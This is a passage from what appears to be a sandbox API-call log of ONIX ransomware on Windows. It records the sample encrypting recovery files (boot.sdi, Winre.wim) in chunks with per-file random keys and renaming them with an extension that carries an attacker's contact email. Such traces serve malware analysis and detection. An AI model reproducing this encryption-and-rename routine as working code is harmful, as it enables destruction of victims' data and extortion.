(lpFileName="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x464 [0065.601] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.601] LockFile (hFile=0x464, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x306000, nNumberOfBytesToLockHigh=0x0) returned 1 [0065.601] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0065.601] ReadFile (in: hFile=0x464, lpBuffer=0x530000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x530000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0065.603] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0065.603] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.603] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48dae8 | out: pbBuffer=0x48dae8) returned 1 [0065.603] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x466788 | out: pbBuffer=0x466788) returned 1 [0065.603] SetFileAttributesW (lpFileName="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", dwFileAttributes=0x80) returned 1 [0065.603] lstrlenW (lpString="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi") returned 58 [0065.603] GetProcessHeap () returned 0x410000 [0065.603] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe4) returned 0x461440 [0065.603] lstrcpyW (in: lpString1=0x461440, lpString2="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi" | out: lpString1="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi") returned="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi" [0065.603] lstrcatW (in: lpString1="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0065.604] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=3170304) returned 1 [0065.604] SetFilePointer (in: hFile=0x464, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x306000 [0065.604] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0065.604] GetProcessHeap () returned 0x410000 [0065.604] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x48dbf0 [0065.604] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48dbf0*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x48dbf0*, pdwDataLen=0x367f414*=0x100) returned 1 [0065.604] WriteFile (in: hFile=0x464, lpBuffer=0x48dbf0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x48dbf0*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0065.609] WriteFile (in: hFile=0x464, lpBuffer=0x466788*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x466788*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0065.610] WriteFile (in: hFile=0x464, lpBuffer=0x466788*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x466788*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0065.611] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x306000) returned 0x3680020 [0065.612] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x306000) returned 0x3990020 [0065.612] SetFilePointer (in: hFile=0x464, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.612] ReadFile (in: hFile=0x464, lpBuffer=0x3680020, nNumberOfBytesToRead=0x306000, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesRead=0x367f44c*=0x306000, lpOverlapped=0x0) returned 1 [0066.026] UnlockFile (hFile=0x464, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x306000, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0066.026] CloseHandle (hObject=0x464) returned 1 [0066.088] GetProcessHeap () returned 0x410000 [0066.088] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48dbf0 | out: hHeap=0x410000) returned 1 [0066.088] MoveFileExW (lpExistingFileName="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi"), lpNewFileName="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0066.092] GetProcessHeap () returned 0x410000 [0066.093] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x461440 | out: hHeap=0x410000) returned 1 [0066.093] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48dae8 | out: hHeap=0x410000) returned 1 [0066.093] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466788 | out: hHeap=0x410000) returned 1 [0066.093] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b88 | out: hHeap=0x410000) returned 1 [0066.093] FindNextFileW (in: hFindFile=0x48e7f0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30a06ef0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x30a06ef0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30a06ef0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0066.093] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0066.093] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0066.093] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x457f50 [0066.093] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0066.093] GetLastError () returned 0x0 [0066.093] FindNextFileW (in: hFindFile=0x48e7f0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x6496a3c6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x64b0e1b9, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfa6eb761, ftLastWriteTime.dwHighDateTime=0x1cb88d1, nFileSizeHigh=0x0, nFileSizeLow=0xa160012, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Winre.wim", cAlternateFileName="")) returned 1 [0066.093] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0066.093] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0066.093] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x457f50 [0066.093] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0066.093] GetLastError () returned 0x0 [0066.093] CreateFileW (lpFileName="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\winre.wim"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x464 [0066.096] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0066.096] LockFile (hFile=0x464, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xa160012, nNumberOfBytesToLockHigh=0x0) returned 1 [0066.096] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.096] ReadFile (in: hFile=0x464, lpBuffer=0x530000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x530000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0066.100] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.100] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0066.100] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48dae8 | out: pbBuffer=0x48dae8) returned 1 [0066.101] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x466788 | out: pbBuffer=0x466788) returned 1 [0066.101] SetFileAttributesW (lpFileName="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", dwFileAttributes=0x80) returned 1 [0066.101] lstrlenW (lpString="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim") returned 59 [0066.101] GetProcessHeap () returned 0x410000 [0066.101] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe6) returned 0x461440 [0066.101] lstrcpyW (in: lpString1=0x461440, lpString2="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim" | out: lpString1="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim") returned="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim" [0066.101] lstrcatW (in: lpString1="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0066.101] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=169213970) returned 1 [0066.101] SetFilePointer (in: hFile=0x464, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0xa160012 [0066.101] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0066.101] GetProcessHeap () returned 0x410000 [0066.101] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x48dbf0 [0066.101] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48dbf0*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x48dbf0*, pdwDataLen=0x367f414*=0x100) returned 1 [0066.101] WriteFile (in: hFile=0x464, lpBuffer=0x48dbf0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x48dbf0*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0066.165] WriteFile (in: hFile=0x464, lpBuffer=0x466788*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x466788*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0066.166] WriteFile (in: hFile=0x464, lpBuffer=0x466788*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x466788*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0066.167] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x100000) returned 0x2b30020 [0066.168] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x100000) returned 0x3680020 [0066.168] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x1300000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.168] ReadFile (in: hFile=0x464, lpBuffer=0x2b30020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2b30020*, lpNumberOfBytesRead=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0066.475] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xa16011a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.475] WriteFile (in: hFile=0x464, lpBuffer=0x367f448*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x367f448*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0066.476] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x2600000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.476] ReadFile (in: hFile=0x464, lpBuffer=0x2b30020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2b30020*, lpNumberOfBytesRead=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0066.487] SetFilePointer (in: hFile=0x464, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2600000 [0066.487] WriteFile (in: hFile=0x464, lpBuffer=0x3680020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesWritten=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0066.608] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xa16011a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.608] WriteFile (in: hFile=0x464, lpBuffer=0x367f448*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x367f448*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0066.609] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x3900000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.609] ReadFile (in: hFile=0x464, lpBuffer=0x2b30020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2b30020*, lpNumberOfBytesRead=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0066.639] SetFilePointer (in: hFile=0x464, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3900000 [0066.639] WriteFile (in: hFile=0x464, lpBuffer=0x3680020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesWritten=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0066.703] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xa16011a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.704] WriteFile (in: hFile=0x464, lpBuffer=0x367f448*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x367f448*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0066.704] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x4c00000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.704] ReadFile (in: hFile=0x464, lpBuffer=0x2b30020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2b30020*, lpNumberOfBytesRead=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0066.715] SetFilePointer (in: hFile=0x464, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4c00000 [0066.715] WriteFile (in: hFile=0x464, lpBuffer=0x3680020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesWritten=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0066.751] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xa16011a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.751] WriteFile (in: hFile=0x464, lpBuffer=0x367f448*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x367f448*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0066.751] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x5f00000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.751] ReadFile (in: hFile=0x464, lpBuffer=0x2b30020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2b30020*, lpNumberOfBytesRead=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0066.777] SetFilePointer (in: hFile=0x464, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5f00000 [0066.777] WriteFile (in: hFile=0x464, lpBuffer=0x3680020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesWritten=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0066.804] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xa16011a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.804] WriteFile (in: hFile=0x464, lpBuffer=0x367f448*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x367f448*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0066.805] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x7200000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.805] ReadFile (in: hFile=0x464, lpBuffer=0x2b30020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2b30020*, lpNumberOfBytesRead=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0066.816] SetFilePointer (in: hFile=0x464, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7200000 [0066.816] WriteFile (in: hFile=0x464, lpBuffer=0x3680020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesWritten=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0067.620] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xa16011a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0067.620] WriteFile (in: hFile=0x464, lpBuffer=0x367f448*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x367f448*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0067.621] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x8500000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0067.621] ReadFile (in: hFile=0x464, lpBuffer=0x2b30020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2b30020*, lpNumberOfBytesRead=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0067.635] SetFilePointer (in: hFile=0x464, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8500000 [0067.635] WriteFile (in: hFile=0x464, lpBuffer=0x3680020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesWritten=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0067.717] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xa16011a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0067.717] WriteFile (in: hFile=0x464, lpBuffer=0x367f448*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x367f448*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0067.718] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x9800000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0067.718] ReadFile (in: hFile=0x464, lpBuffer=0x2b30020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2b30020*, lpNumberOfBytesRead=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0067.729] SetFilePointer (in: hFile=0x464, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9800000 [0067.729] WriteFile (in: hFile=0x464, lpBuffer=0x3680020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesWritten=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0068.196] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xa16011a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0068.196] WriteFile (in: hFile=0x464, lpBuffer=0x367f448*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x367f448*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0068.196] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x2b30020 | out: hHeap=0x410000) returned 1 [0068.201] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x3680020 | out: hHeap=0x410000) returned 1 [0068.205] UnlockFile (hFile=0x464, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xa160012, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0068.205] CloseHandle (hObject=0x464) returned 1 [0068.555] GetProcessHeap () returned 0x410000 [0068.555] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48dbf0 | out: hHeap=0x410000) returned 1 [0068.555] MoveFileExW (lpExistingFileName="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\winre.wim"), lpNewFileName="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\winre.wim.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0068.558] GetProcessHeap () returned 0x410000 [0068.558] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x461440 | out: hHeap=0x410000) returned 1 [0068.558] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48dae8 | out: hHeap=0x410000) returned 1 [0068.558] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466788 | out: hHeap=0x410000) returned 1 [0068.558] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b88 | out: hHeap=0x410000) returned 1 [0068.558] FindNextFileW (in: hFindFile=0x48e7f0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x6496a3c6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x64b0e1b9, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfa6eb761, ftLastWriteTime.dwHighDateTime=0x1cb88d1, nFileSizeHigh=0x0, nFileSizeLow=0xa160012, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Winre.wim", cAlternateFileName="")) returned 0 [0068.558] CloseHandle (hObject=0x3cc) returned 1 [0068.559] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0068.559] GetSystemTime (in: lpSystemTime=0x530400 | out: lpSystemTime=0x530400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x8, wMilliseconds=0x8a)) [0068.559] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x540000 [0068.559] GetWindowsDirectoryW (in: lpBuffer=0x540000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0068.559] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x540200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x540600, lpMaximumComponentLength=0x540608, lpFileSystemFlags=0x540604, lpFileSystemNameBuffer=0x540400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x540600*=0x9c354b42, lpMaximumComponentLength=0x540608*=0xff, lpFileSystemFlags=0x540604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0068.559] wsprintfW (in: param_1=0x530000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz9c354ca09c354b444c.lock") returned 53 [0068.560] CreateFileW 